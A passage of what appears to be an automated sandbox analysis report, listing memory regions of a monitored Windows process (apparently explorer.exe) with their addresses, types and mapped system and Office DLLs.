filename = "" Region: id = 577 start_va = 0xb4f0000 end_va = 0xb56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4f0000" filename = "" Region: id = 578 start_va = 0xb670000 end_va = 0xb6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b670000" filename = "" Region: id = 579 start_va = 0xb6f0000 end_va = 0xb76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6f0000" filename = "" Region: id = 580 start_va = 0xb970000 end_va = 0xc36ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b970000" filename = "" Region: id = 581 start_va = 0xcd60000 end_va = 0xd251fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd60000" filename = "" Region: id = 582 start_va = 0xd260000 end_va = 0xd751fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d260000" filename = "" Region: id = 583 start_va = 0xf8f0000 end_va = 0xf96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f8f0000" filename = "" Region: id = 584 start_va = 0xf970000 end_va = 0xf9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f970000" filename = "" Region: id = 585 start_va = 0xf9f0000 end_va = 0xfa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f9f0000" filename = "" Region: id = 586 start_va = 0xfa70000 end_va = 0xfaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fa70000" filename = "" Region: id = 587 start_va = 0xfaf0000 end_va = 0xfb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000faf0000" filename = "" Region: id = 588 start_va = 0xfb70000 end_va = 0xfbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb70000" filename = "" Region: id = 589 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 590 start_va = 0x180000000 end_va = 0x18087dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~1\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\micros~1\\office16\\1033\\grooveintlresource.dll") Region: id = 591 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 592 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 593 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 594 start_va = 0x7ff7a75c0000 end_va = 0x7ff7a7a07fff monitored = 0 entry_point = 0x7ff7a765e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 595 start_va = 0x7ff9fc4c0000 end_va = 0x7ff9fc50ffff monitored = 0 entry_point = 0x7ff9fc4f1220 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: "c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 596 start_va = 0x7ff9fe050000 end_va = 0x7ff9fe0fbfff monitored = 0 entry_point = 0x7ff9fe0559c0 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 597 start_va = 0x7ff9fe370000 end_va = 0x7ff9ff03cfff monitored = 0 entry_point = 0x7ff9fe4be880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 598 start_va = 0x7ffa00480000 end_va = 0x7ffa007c5fff monitored = 0 entry_point = 0x7ffa00488530 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 599 start_va = 0x7ffa007d0000 end_va = 0x7ffa0098ffff monitored = 0 entry_point = 0x7ffa007d9e40 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 600 start_va = 0x7ffa00990000 end_va = 0x7ffa00a17fff monitored = 0 entry_point = 0x7ffa009a4510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 601 start_va = 0x7ffa00a20000 end_va = 0x7ffa00c62fff monitored = 0 entry_point = 0x7ffa00a236c0 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 602 start_va = 0x7ffa00cf0000 end_va = 0x7ffa00d3ffff monitored = 0 entry_point = 0x7ffa00cfbe50 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 603 start_va = 0x7ffa00d40000 end_va = 0x7ffa00d81fff monitored = 0 entry_point = 0x7ffa00d42230 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 604 start_va = 0x7ffa00d90000 end_va = 0x7ffa00e08fff monitored = 0 entry_point = 0x7ffa00d922d0 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 605 start_va = 0x7ffa00e10000 end_va = 0x7ffa00e8afff monitored = 0 entry_point = 0x7ffa00e13af0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 606 start_va = 0x7ffa00e90000 end_va = 0x7ffa00fe9fff monitored = 0 entry_point = 0x7ffa00e94610 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 607 start_va = 0x7ffa00ff0000 end_va = 0x7ffa011edfff monitored = 0 entry_point = 0x7ffa00ff16c0 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 608 start_va = 0x7ffa011f0000 end_va = 0x7ffa01253fff monitored = 0 entry_point = 0x7ffa011f6b20 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 609 start_va = 0x7ffa01360000 end_va = 0x7ffa014a0fff monitored = 0 entry_point = 0x7ffa01365f70 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 610 start_va = 0x7ffa014b0000 end_va = 0x7ffa01658fff monitored = 0 entry_point = 0x7ffa01504060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 611 start_va = 0x7ffa017f0000 end_va = 0x7ffa0182dfff monitored = 0 entry_point = 0x7ffa017f9650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 612 start_va = 0x7ffa058a0000 end_va = 0x7ffa058fbfff monitored = 0 entry_point = 0x7ffa058b7190 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 613 start_va = 0x7ffa05900000 end_va = 0x7ffa05996fff monitored = 0 entry_point = 0x7ffa0590ddc0 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 614 start_va = 0x7ffa059a0000 end_va = 0x7ffa059abfff monitored = 0 entry_point = 0x7ffa059a14b0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 615 start_va = 0x7ffa059c0000 end_va = 0x7ffa05c39fff monitored = 0 entry_point = 0x7ffa059da7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 616 start_va = 0x7ffa05c80000 end_va = 0x7ffa05ca5fff monitored = 0 entry_point = 0x7ffa05c95cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 617 start_va = 0x7ffa05cb0000 end_va = 0x7ffa05cdafff monitored = 0 entry_point = 0x7ffa05cb4240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 618 start_va = 0x7ffa05ce0000 end_va = 0x7ffa05d27fff monitored = 0 entry_point = 0x7ffa05cea430 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 619 start_va = 0x7ffa05d30000 end_va = 0x7ffa05db5fff monitored = 0 entry_point = 0x7ffa05d51e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 620 start_va = 0x7ffa05e50000 end_va = 0x7ffa05e6afff monitored = 0 entry_point = 0x7ffa05e5af40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 621 start_va = 0x7ffa05e90000 end_va = 0x7ffa05f69fff monitored = 0 entry_point = 0x7ffa05ec3c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 622 start_va = 0x7ffa05f70000 end_va = 0x7ffa06035fff monitored = 0 entry_point = 0x7ffa05f73ac0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 623 start_va = 0x7ffa06040000 end_va = 0x7ffa06076fff monitored = 0 entry_point = 0x7ffa060420a0 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 624 start_va = 0x7ffa06080000 end_va = 0x7ffa063b9fff monitored = 0 entry_point = 0x7ffa06088520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 625 start_va = 0x7ffa063c0000 end_va = 0x7ffa063cbfff monitored = 0 entry_point = 0x7ffa063c4150 region_type = mapped_file name = "vcruntime140_1.dll" filename = "\\Windows\\System32\\vcruntime140_1.dll" (normalized: "c:\\windows\\system32\\vcruntime140_1.dll") Region: id = 626 start_va = 0x7ffa063d0000 end_va = 0x7ffa06460fff monitored = 0 entry_point = 0x7ffa06422430 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 627 start_va = 0x7ffa06470000 end_va = 0x7ffa06488fff monitored = 0 entry_point = 0x7ffa0647ee50 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 628 start_va = 0x7ffa06490000 end_va = 0x7ffa066a3fff monitored = 0 entry_point = 0x7ffa06491000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\micros~1\\office16\\grooveex.dll") Region: id = 629 start_va = 0x7ffa066b0000 end_va = 0x7ffa066bcfff monitored = 0 entry_point = 0x7ffa066b1ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 630 start_va = 0x7ffa066c0000 end_va = 0x7ffa0670cfff monitored = 0 entry_point = 0x7ffa066d7de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 631 start_va = 0x7ffa06710000 end_va = 0x7ffa0682ffff monitored = 0 entry_point = 0x7ffa06748310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 632 start_va = 0x7ffa06830000 end_va = 0x7ffa06855fff monitored = 0 entry_point = 0x7ffa06831cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 633 start_va = 0x7ffa06860000 end_va = 0x7ffa0693afff monitored = 0 entry_point = 0x7ffa068728b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 634 start_va = 0x7ffa06960000 end_va = 0x7ffa06981fff monitored = 0 entry_point = 0x7ffa06962580 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 635 start_va = 0x7ffa069a0000 end_va = 0x7ffa069b5fff monitored = 0 entry_point = 0x7ffa069a1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 636 start_va = 0x7ffa069c0000 end_va = 0x7ffa069cbfff monitored = 0 entry_point = 0x7ffa069c18b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 637 start_va = 0x7ffa069d0000 end_va = 0x7ffa06a1cfff monitored = 0 entry_point = 0x7ffa069dd180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 638 start_va = 0x7ffa06a20000 end_va = 0x7ffa0752afff monitored = 0 entry_point = 0x7ffa06b6a540 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 639 start_va = 0x7ffa07530000 end_va = 0x7ffa0757ffff monitored = 0 entry_point = 0x7ffa07532580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 640 start_va = 0x7ffa07580000 end_va = 0x7ffa07a1ffff monitored = 0 entry_point = 0x7ffa07618740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 641 start_va = 0x7ffa07bd0000 end_va = 0x7ffa07c19fff monitored = 0 entry_point = 0x7ffa07bd5800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 642 start_va = 0x7ffa07fa0000 end_va = 0x7ffa07fb4fff monitored = 0 entry_point = 0x7ffa07fa5740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 643 start_va = 0x7ffa07fc0000 end_va = 0x7ffa0800afff monitored = 0 entry_point = 0x7ffa07fd1590 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 644 start_va = 0x7ffa08010000 end_va = 0x7ffa08079fff monitored = 0 entry_point = 0x7ffa08025e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 645 start_va = 0x7ffa08080000 end_va = 0x7ffa080e4fff monitored = 0 entry_point = 0x7ffa08084c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 646 start_va = 0x7ffa080f0000 end_va = 0x7ffa08363fff monitored = 0 entry_point = 0x7ffa08160400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 647 start_va = 0x7ffa08370000 end_va = 0x7ffa08384fff monitored = 0 entry_point = 0x7ffa08372c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 648 start_va = 0x7ffa084a0000 end_va = 0x7ffa08598fff monitored = 0 entry_point = 0x7ffa084e8000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 649 start_va = 0x7ffa085c0000 end_va = 0x7ffa0884dfff monitored = 0 entry_point = 0x7ffa08690f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 650 start_va = 0x7ffa08a00000 end_va = 0x7ffa08a0bfff monitored = 0 entry_point = 0x7ffa08a035c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 651 start_va = 0x7ffa08ab0000 end_va = 0x7ffa08ac6fff monitored = 0 entry_point = 0x7ffa08ab2790 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 652 start_va = 0x7ffa08ad0000 end_va = 0x7ffa08adffff monitored = 0 entry_point = 0x7ffa08ad78e0 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 653 start_va = 0x7ffa08ba0000 end_va = 0x7ffa08c50fff monitored = 0 entry_point = 0x7ffa08bb08f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 654 start_va = 0x7ffa08df0000 end_va = 0x7ffa08dfffff monitored = 0 entry_point = 0x7ffa08df3d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 655 start_va = 0x7ffa08e00000 end_va = 0x7ffa08e1efff monitored = 0 entry_point = 0x7ffa08e037e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 656 start_va = 0x7ffa08e20000 end_va = 0x7ffa08e98fff monitored = 0 entry_point = 0x7ffa08e276a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 657 start_va = 0x7ffa08eb0000 end_va = 0x7ffa08eeffff monitored = 0 entry_point = 0x7ffa08ec6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 658 start_va = 0x7ffa09580000 end_va = 0x7ffa09737fff monitored = 0 entry_point = 0x7ffa095ee630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 659 start_va = 0x7ffa09dd0000 end_va = 0x7ffa09e63fff monitored = 0 entry_point = 0x7ffa09e09210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 660 start_va = 0x7ffa09e70000 end_va = 0x7ffa0a112fff monitored = 0 entry_point = 0x7ffa09e96190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 661 start_va = 0x7ffa0a120000 end_va = 0x7ffa0a134fff monitored = 0 entry_point = 0x7ffa0a121ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 662 start_va = 0x7ffa0a1c0000 end_va = 0x7ffa0a1eafff monitored = 0 entry_point = 0x7ffa0a1cc3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 663 start_va = 0x7ffa0a1f0000 end_va = 0x7ffa0a2fcfff monitored = 0 entry_point = 0x7ffa0a21f420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 664 start_va = 0x7ffa0a380000 end_va = 0x7ffa0a3defff monitored = 0 entry_point = 0x7ffa0a3abce0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 665 start_va = 0x7ffa0a490000 end_va = 0x7ffa0a55dfff monitored = 0 entry_point = 0x7ffa0a4c14c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 666 start_va = 0x7ffa0a790000 end_va = 0x7ffa0a9ecfff monitored = 0 entry_point = 0x7ffa0a818610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 667 start_va = 0x7ffa0a9f0000 end_va = 0x7ffa0a9f8fff monitored = 0 entry_point = 0x7ffa0a9f1480 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 668 start_va = 0x7ffa0ad90000 end_va = 0x7ffa0addafff monitored = 0 entry_point = 0x7ffa0ada7b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 669 start_va = 0x7ffa0afc0000 end_va = 0x7ffa0afd1fff monitored = 0 entry_point = 0x7ffa0afc3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 670 start_va = 0x7ffa0aff0000 end_va = 0x7ffa0affbfff monitored = 0 entry_point = 0x7ffa0aff1860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 671 start_va = 0x7ffa0b000000 end_va = 0x7ffa0b01ffff monitored = 0 entry_point = 0x7ffa0b001920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 672 start_va = 0x7ffa0b020000 end_va = 0x7ffa0b035fff monitored = 0 entry_point = 0x7ffa0b023380 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 673 start_va = 0x7ffa0b040000 end_va = 0x7ffa0b04afff monitored = 0 entry_point = 0x7ffa0b041a40 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 674 start_va = 0x7ffa0b050000 end_va = 0x7ffa0b06afff monitored = 0 entry_point = 0x7ffa0b051040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 675 start_va = 0x7ffa0b070000 end_va = 0x7ffa0b2f7fff monitored = 0 entry_point = 0x7ffa0b0cf670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 676 start_va = 0x7ffa0b320000 end_va = 0x7ffa0b32dfff monitored = 0 entry_point = 0x7ffa0b321460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 677 start_va = 0x7ffa0b920000 end_va = 0x7ffa0b98cfff monitored = 0 entry_point = 0x7ffa0b92d750 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 678 start_va = 0x7ffa0b9f0000 end_va = 0x7ffa0ba09fff monitored = 0 entry_point = 0x7ffa0b9f2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 679 start_va = 0x7ffa0ba10000 end_va = 0x7ffa0ba25fff monitored = 0 entry_point = 0x7ffa0ba119f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 680 start_va = 0x7ffa0bac0000 end_va = 0x7ffa0bae7fff monitored = 0 entry_point = 0x7ffa0bac8c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 681 start_va = 0x7ffa0baf0000 end_va = 0x7ffa0bb27fff monitored = 0 entry_point = 0x7ffa0bb08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 682 start_va = 0x7ffa0bbe0000 end_va = 0x7ffa0bc8dfff monitored = 0 entry_point = 0x7ffa0bbf80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 683 start_va = 0x7ffa0bdd0000 end_va = 0x7ffa0be6ffff monitored = 0 entry_point = 0x7ffa0be40910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 684 start_va = 0x7ffa0be70000 end_va = 0x7ffa0bebdfff monitored = 0 entry_point = 0x7ffa0be81ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 685 start_va = 0x7ffa0bec0000 end_va = 0x7ffa0bfe0fff monitored = 0 entry_point = 0x7ffa0bec1cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 686 start_va = 0x7ffa0c1f0000 end_va = 0x7ffa0c212fff monitored = 0 entry_point = 0x7ffa0c1f99a0 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 687 start_va = 0x7ffa0c300000 end_va = 0x7ffa0c318fff monitored = 0 entry_point = 0x7ffa0c304520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 688 start_va = 0x7ffa0c8f0000 end_va = 0x7ffa0c990fff monitored = 0 entry_point = 0x7ffa0c8f3db0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 689 start_va = 0x7ffa0c9c0000 end_va = 0x7ffa0ca2ffff monitored = 0 entry_point = 0x7ffa0c9e2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 690 start_va = 0x7ffa0cc80000 end_va = 0x7ffa0ce3cfff monitored = 0 entry_point = 0x7ffa0ccaaf90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = 